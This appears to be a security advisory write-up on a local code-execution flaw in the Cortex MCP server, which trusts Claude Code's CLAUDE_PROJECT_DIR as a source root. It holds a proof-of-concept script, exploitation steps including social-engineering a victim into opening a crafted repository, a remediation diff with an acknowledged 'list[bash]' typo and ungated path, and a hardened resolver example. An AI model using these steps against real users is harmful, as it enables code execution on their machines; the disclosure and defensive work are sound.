How the Mentioned CVE Works
The vulnerability exists in how the Cortex MCP server (neuro-cortex-memory) handles the `CLAUDE_PROJECT_DIR` environment variable. This variable is automatically set by Claude Code to the directory the user currently has open. When a user invokes the `open_visualization` tool, the function `_find_dev_source()` builds a list of candidate directories by iterating over `CORTEX_DEV_ROOT` and `CLAUDE_PROJECT_DIR`, and so treats the user's active project directory as a trusted Cortex source root.
The only validation performed by `_is_cortex_root()` is checking for the presence of an `mcp_server/` subdirectory and a `ui/unified-viz.html` file. These are trivial markers that an attacker can easily replicate in a malicious repository. There is no git remote identity check, cryptographic signature verification, release path allowlist, or explicit developer opt-in requirement.
Once a directory passes this weak validation, the handler constructs a bootstrap path and executes it unconditionally via `subprocess.run([sys.executable, str(bootstrap_path)])`. A secondary code-execution path exists in `http_launcher.py`, where the same `CLAUDE_PROJECT_DIR`-derived dev source is used to `rsync` attacker-controlled files into the Cortex plugin cache directory.
The entry point is the MCP tool `open_visualization`, registered with no authentication required at the tool layer. The tool is reachable through the standard stdio MCP transport. An attacker who places the two marker files in a malicious repository can cause Cortex to execute an arbitrary `visualize_bootstrap.py` from that directory, achieving code execution with the privileges of the victim's local user process. CVSS v3.1 Base Score: 7.8 (High).
DailyCVE Form
Platform: Cortex MCP server
Version: ≥ 3.17.0
Vulnerability: Local Code Execution
Severity: High (7.8 CVSS)
Date: 2026-07-01
Prediction: 2026-07-15
What Undercode Says
The vulnerability stems from trusting an environment variable that is automatically set by Claude Code without any verification of the source directory’s authenticity. The weak validation (only checking for two marker files) makes it trivial for attackers to craft malicious repositories. This is a classic case of insufficient validation of user-controlled input leading to arbitrary code execution.
Analytics Commands:
```bash
# Check if the Cortex MCP server is installed, and its version
pip show neuro-cortex-memory
# Check for the presence of the vulnerable files in a project
ls -la mcp_server/server/visualize_bootstrap.py
ls -la ui/unified-viz.html
# Monitor for suspicious subprocess execution
ps aux | grep -E "python.*visualize_bootstrap"
# Check environment variables
echo "$CLAUDE_PROJECT_DIR"
```
PoC Code Snippet:
```python
import asyncio, os, tempfile
from pathlib import Path
from mcp_server.handlers import open_visualization as ov

# Project directory carrying only the two marker files the weak check looks for
base = Path(tempfile.mkdtemp(prefix="cortex-malicious-project-"))
(base / "mcp_server" / "server").mkdir(parents=True)
(base / "ui").mkdir()
(base / "ui" / "unified-viz.html").write_text("<html>attacker</html>", encoding="utf-8")

sentinel = Path("/tmp/cortex-open-visualization-poc-owned")
if sentinel.exists():
    sentinel.unlink()

# Bootstrap script that records that it ran
(base / "mcp_server" / "server" / "visualize_bootstrap.py").write_text(
    "from pathlib import Path\n"
    "Path('/tmp/cortex-open-visualization-poc-owned').write_text('executed', encoding='utf-8')\n"
    "print('bootstrap-ran')\n",
    encoding="utf-8",
)

# Simulate Claude Code having this directory open
os.environ["CLAUDE_PROJECT_DIR"] = str(base)
ov.launch_server = lambda _typ: "http://127.0.0.1:3458"
ov.open_in_browser = lambda _url: None
result = asyncio.run(ov.handler({}))
print(result.get("bootstrap"))
print(sentinel.read_text())
```
Expected output: bootstrap-ran / executed
Exploit
The attack requires the victim to have the Cortex MCP plugin installed and to open an attacker-crafted project directory in Claude Code. When the victim invokes the `open_visualization` tool (e.g., via the `/cortex-visualize` slash command), attacker-controlled Python code runs immediately with the full privileges of the victim’s local user account.
Exploitation Steps:
- Create a malicious repository with the following structure:
```
malicious-project/
├── mcp_server/
│   └── server/
│       └── visualize_bootstrap.py   # Attacker-controlled code
└── ui/
    └── unified-viz.html             # Dummy marker file
```
- Social-engineer the victim into opening this repository in Claude Code (this automatically sets `CLAUDE_PROJECT_DIR` to the repository path).
- Wait for the victim to invoke the `/cortex-visualize` command or trigger the `open_visualization` MCP tool.
- The attacker’s code executes with the victim’s local user privileges.
Secondary Exploitation Path:
The `http_launcher.py` path allows the attacker to overwrite files in the Cortex plugin cache directory via rsync, potentially establishing persistence that survives after the malicious project is closed.
Protection
Immediate Remediation:
Remove `CLAUDE_PROJECT_DIR` from the dev-source candidate list. Gate executable dev-source resolution behind an explicit opt-in flag so that only a developer who deliberately sets both `CORTEX_DEV_SOURCE_SYNC=1` and `CORTEX_DEV_ROOT` can trigger the bootstrap path:
a/mcp_server/handlers/open_visualization.py
+++ b/mcp_server/handlers/open_visualization.py
- candidates: list[bash] = []
- for env in ("CORTEX_DEV_ROOT", "CLAUDE_PROJECT_DIR"):
- v = os.environ.get(env)
- if v:
- candidates.append(Path(v))
+ candidates: list[bash] = []
+ if os.environ.get("CORTEX_DEV_SOURCE_SYNC") == "1":
+ v = os.environ.get("CORTEX_DEV_ROOT")
+ if v:
+ candidates.append(Path(v))
candidates.append(Path.home() / "Documents" / "Developments" / "Cortex")
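Review bot: the unchanged trailing line `candidates.append(Path.home() / "Documents" / "Developments" / "Cortex")` still adds a fixed home-directory path to the candidate list outside the new `CORTEX_DEV_SOURCE_SYNC` gate, so a directory at that path carrying the two marker files is trusted as an executable dev source with no opt-in at all; consider moving that append inside the `if os.environ.get("CORTEX_DEV_SOURCE_SYNC") == "1":` block so the opt-in covers every candidate. Separately, the annotation `list[bash]` on both the removed and added `candidates` lines reads as a transcription error for `list[Path]`, given that the elements appended are `Path(v)`; a type checker would flag it, so it is worth correcting in the same change.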
Apply the same change to `mcp_server/server/http_launcher.py:80-83` to eliminate the secondary `rsync` execution path.
Additional Protections:
- Implement cryptographic signature verification for dev-source directories.
- Add a git remote identity check to ensure the source is from a trusted repository.
- Require explicit user opt-in before executing any code from a project directory.
- Run MCP servers with restricted privileges or in a sandboxed environment.
- Regularly update the Cortex MCP server to the latest version.
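As an added example (not code from the Cortex project), the following shows the marker-only resolver pattern described in "How the Mentioned CVE Works" beside a hardened resolver that implements the immediate remediation and the opt-in and git-remote-identity protections listed above: resolution only happens when the developer has set both `CORTEX_DEV_SOURCE_SYNC=1` and `CORTEX_DEV_ROOT`, `CLAUDE_PROJECT_DIR` is never consulted, and the checkout's `origin` remote must be on an allowlist. The function names, the `TRUSTED_REMOTES` placeholder URL, the `git remote get-url origin` lookup and the constructed fixture directory are all assumptions for this example; the real `_find_dev_source()` and `_is_cortex_root()` are known here only from the description above.

```python
"""Dev-source resolution: the marker-only pattern the advisory describes, beside a
hardened resolver with the recommended opt-in gate and a git remote allowlist.
Added example, not code from the Cortex project."""
import shutil
import subprocess
import tempfile
from pathlib import Path
from typing import Callable, Mapping, Optional

# Assumed allowlist of canonical upstream clone URLs (placeholder, not from the advisory).
TRUSTED_REMOTES = frozenset({"https://example.invalid/cortex/cortex.git"})

RemoteLookup = Callable[[Path], Optional[str]]


def is_cortex_root(path: Path) -> bool:
    """The two-marker check the advisory describes: any repository can ship both files."""
    return (path / "mcp_server").is_dir() and (path / "ui" / "unified-viz.html").is_file()


def find_dev_source_weak(env: Mapping[str, str]) -> Optional[Path]:
    """Vulnerable pattern: CLAUDE_PROJECT_DIR (set automatically by Claude Code) becomes
    a trusted source root as soon as it carries the two marker files."""
    for name in ("CORTEX_DEV_ROOT", "CLAUDE_PROJECT_DIR"):
        value = env.get(name)
        if value and is_cortex_root(Path(value)):
            return Path(value)
    return None


def git_remote_url(path: Path) -> Optional[str]:
    """Read the origin URL of a checkout; None if git is unavailable or it is not a repo."""
    try:
        proc = subprocess.run(
            ["git", "-C", str(path), "remote", "get-url", "origin"],
            capture_output=True, text=True, check=True, timeout=5,
        )
    except (OSError, subprocess.CalledProcessError, subprocess.TimeoutExpired):
        return None
    return proc.stdout.strip() or None


def find_dev_source_hardened(
    env: Mapping[str, str],
    trusted_remotes: frozenset = TRUSTED_REMOTES,
    remote_lookup: RemoteLookup = git_remote_url,
) -> Optional[Path]:
    """Hardened resolver: only a deliberately opted-in CORTEX_DEV_ROOT that carries the
    markers and points at an allowlisted remote is returned. CLAUDE_PROJECT_DIR is ignored."""
    if env.get("CORTEX_DEV_SOURCE_SYNC") != "1":
        return None
    root = env.get("CORTEX_DEV_ROOT")
    if not root:
        return None
    path = Path(root).resolve()
    if not is_cortex_root(path):
        return None
    if remote_lookup(path) not in trusted_remotes:
        return None
    return path


def make_marker_tree(base: Path) -> None:
    """Constructed fixture: a directory that passes the marker-only check."""
    (base / "mcp_server" / "server").mkdir(parents=True, exist_ok=True)
    (base / "ui").mkdir(exist_ok=True)
    (base / "ui" / "unified-viz.html").write_text("<html></html>", encoding="utf-8")


def demo() -> dict:
    """Run both resolvers against a constructed project directory and report outcomes."""
    base = Path(tempfile.mkdtemp(prefix="cortex-resolver-demo-")).resolve()
    try:
        make_marker_tree(base)
        victim_env = {"CLAUDE_PROJECT_DIR": str(base)}  # what Claude Code sets automatically
        dev_env = {"CORTEX_DEV_SOURCE_SYNC": "1", "CORTEX_DEV_ROOT": str(base)}
        # Stand-in remote lookups so the demo runs without git or network access
        trusted = lambda _p: "https://example.invalid/cortex/cortex.git"
        untrusted = lambda _p: "https://example.invalid/someone/fork.git"
        return {
            "weak_trusts_project_dir": find_dev_source_weak(victim_env) == base,
            "hardened_ignores_project_dir": find_dev_source_hardened(victim_env, remote_lookup=trusted) is None,
            "hardened_rejects_untrusted_remote": find_dev_source_hardened(dev_env, remote_lookup=untrusted) is None,
            "hardened_accepts_opted_in_dev": find_dev_source_hardened(dev_env, remote_lookup=trusted) == base,
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'ok' if ok else 'FAIL'}")
```

The remote lookup is injected as a parameter so the behaviour can be exercised offline; in a deployment the default `git_remote_url` would be used and `TRUSTED_REMOTES` filled with the project's real clone URLs. Cryptographic signature verification of the dev-source directory, the first bullet above, is not shown here.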
Impact
This is a local arbitrary code execution vulnerability. Any user who has the Cortex MCP plugin installed and opens (or is social-engineered into opening) an attacker-crafted project directory in Claude Code is at risk. When the victim invokes the `open_visualization` tool, attacker-controlled Python code runs immediately with the full privileges of the victim’s local user account.
Consequences include:
- Confidentiality: Exfiltration of files, secrets, environment variables, and SSH/GPG keys accessible to the local user.
- Integrity: Modification or deletion of local files, source code, credentials, and plugin caches.
- Availability: Termination of local processes or destruction of user data.
The secondary path through `http_launcher.py` additionally allows the attacker to overwrite files in the Cortex plugin cache directory, potentially establishing persistence that survives after the malicious project is closed.
The attack requires the victim to invoke the visualization tool (UI:R), which is reflected in the CVSS score. No elevated privileges or prior authentication to any network service are required.
Sources:
Reported By: github.com